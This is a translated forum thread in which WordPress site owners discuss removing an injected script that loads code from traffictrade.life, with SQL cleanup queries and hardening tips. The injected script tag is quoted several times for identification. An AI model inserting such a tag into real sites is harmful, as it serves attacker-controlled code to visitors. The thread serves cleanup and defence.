2017-07-17 153 views
2

我公司幾年前建立的一個WordPress站點看起來像是感染了惡意軟件。我們應該做些什麼來濾除網站上的惡意軟件並防止再次發生?任何建議不勝感激。感染惡意軟件的Wordpress站點

看起來處處有嵌入的圖像文件,這段代碼被包埋:

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script> 

感謝

+0

使用[Wordfence](https://www.wordfence.com/)掃描您的主題和插件目錄中的惡意代碼。另外,請檢查'.htaccess'文件的內容和權限,因爲該文件通常會在對Wordpress的攻擊中進行修改。 – APAD1

回答

2

存在着一些happear天前的惡意軟件。它也影響了我的舊客戶站點之一。

它幾乎影響到網站的所有帖子和頁面。

如果你看看你的數據庫的wp_posts表中的所有條目的POST_CONTENT,你會看到有這個新的腳本

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script> 

如果爲了輕鬆地刪除這個惡意軟件使用此查詢

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0; 

如果您使用緩存插件,請確保清除緩存。

希望這有助於

+0

我也插入了這個腳本。對於上下文,我使用Tagdiv v2.1運行主題NewsMag,並將coe插入到主題定製「主題面板」的「標題廣告」部分。我擔心的是,即使我手動進入並刪除它,每天或每兩天代碼都會重新插入此處。同時我也重置了所有密碼並升級了WordPress本身,重定向廣告代碼不斷重現。 –

2

其實我已經遇到這個問題我100+的WordPress網站。我採取了以下的安全措施,我所有的網站

  • 刪除無效的插件
  • 刪除不活動的主題
  • 更新WP本身
  • 更新所有活動插件
  • 移居的wp-config.php文件和包括實際wp_config.php中的路徑
  • 添加WP-hide登錄以將wp-admin更改爲用戶所需。
  • 爲有限次數的嘗試添加limit-login-attempts。
  • 將plugins文件夾移至root並重命名它。還要將整個數據庫中的所有/ wp-content /內容替換爲新位置。
  • 更改wp-content目錄名稱,並將/ wp-content /的所有保證替換爲整個數據庫中的新位置。

請使用這個工具來搜索和替換,因爲值可能在_options表中存在的序列化形式 https://interconnectit.com/products/search-and-replace-for-wordpress-databases/

以下是可能的此類惡意軟件存在

<script src='\''https://traffictrade.life/scripts.js'\'' type='\''text/javascript'\''></script> 

<script src="https://traffictrade.life/scripts.js" type="text/javascript"></script> 

<script src="https://traffictrade.life/scripts.js" type="mce-mce-mce-text/javascript"></script> 

<script src="https://traffictrade.life/scripts.js" type="mce-mce-text/javascript"></script> 

<script src="https://traffictrade.life/scripts.js" type="mce-text/javascript"></script> 

希望這有助於。

+1

應該注意的是,您推薦的搜索工具實際上可能是原始的攻擊媒介。一旦你完成了,你也應該立即刪除這個工具(以及它的所有其他實例)。 [https://www.wordfence.com/blog/2017/07/searchreplacedb2-security/] – Sepster

0

我知道這個線程很老,但像上面的註釋之一,我發現注射在選項表中。

在做任何事情備份數據庫之前!

SELECT * FROM wp_options WHERE option_value LIKE '%traffictrade%' 

這會給你帶來一組結果,注入的腳本是以序列化的格式。

;s:22:"tds_logo_menu_upload_r";s:0:"";s:22:"tds_footer_logo_upload";s:0:"";s:29:"tds_footer_retina_logo_upload";s:0:"";s:25:"tds_site_background_image";s:60:"http://www.domain.co.uk/wp-content/uploads/2016/05/BG.png";s:6:"td_ads";a:8:{s:6:"header";a:6:{s:7:"ad_code";s:87:"<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>";s:9:"disable_m";s:0:"";s:10:"disable_tl";s:0:"";s:10:"disable_tp";s:0:"";s:9:"disable_p";s:0:""; 

公告中的代碼traffictrade.life/scripts.js引用(script標籤已被剝離了從網站安全)

從包含它並保存任何結果中移除腳本,該停止被重定向我的網站。

相關問題